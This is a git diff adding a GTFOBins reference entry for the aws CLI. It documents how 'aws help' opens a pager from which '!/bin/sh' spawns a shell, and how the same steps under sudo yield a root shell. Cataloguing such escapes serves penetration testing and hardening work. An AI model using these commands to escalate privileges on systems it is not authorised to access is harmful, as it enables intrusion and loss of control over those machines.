diff --git a/_gtfobins/aws.md b/_gtfobins/aws.md new file mode 100644 index 0000000..d79fcde --- /dev/null +++ b/_gtfobins/aws.md @@ -0,0 +1,13 @@ +--- +functions: + shell: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + aws help + !/bin/sh + sudo: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + sudo aws help + !/bin/sh +---